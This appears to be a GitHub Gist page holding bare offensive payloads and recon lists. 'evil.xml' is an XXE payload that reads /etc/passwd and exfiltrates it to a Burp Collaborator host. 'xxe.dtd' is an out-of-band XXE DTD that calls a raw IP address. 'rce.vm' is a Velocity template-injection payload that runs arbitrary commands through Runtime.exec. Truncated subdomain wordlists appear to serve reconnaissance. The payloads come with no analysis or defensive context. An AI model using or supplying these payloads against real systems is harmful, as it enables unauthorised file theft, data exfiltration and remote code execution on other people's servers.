Skip to content

Instantly share code, notes, and snippets.

View evil.xml
<!ENTITY % xxePOC SYSTEM "file:///etc/passwd">
<!ENTITY % exfildata "<!ENTITY &#x25; exfil SYSTEM 'http://7u2bvf9vu78d9wepre2c3qmg87e82x.burpcollaborator.net/?x=%xxePOC;'>">
%exfildata;
%exfil;
View xxe.dtd
<!ENTITY % d SYSTEM "https://138.68.23.180:443">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://138.68.23.180:443/%d;'>">
View 1stleveldomainsbycount
This file has been truncated, but you can view the full file.
www,719407
api,69552
eks,67581
svc,67131
cloudapp,65945
vpn,55659
bastion,53840
ax,40676
dev,38756
View extracted-subdomains
This file has been truncated, but you can view the full file.
prestigegiftware
12boxing
7clouds
alfredhealth
mywell
phdrastreador
halorei
qa2static
hemoservice
View rce.vm
#set ($e="exp")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
$scan.next()
#end